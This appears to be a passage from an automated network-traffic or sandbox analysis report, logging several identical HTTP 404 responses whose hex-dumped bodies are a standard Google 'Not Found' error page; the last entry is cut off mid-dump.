                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 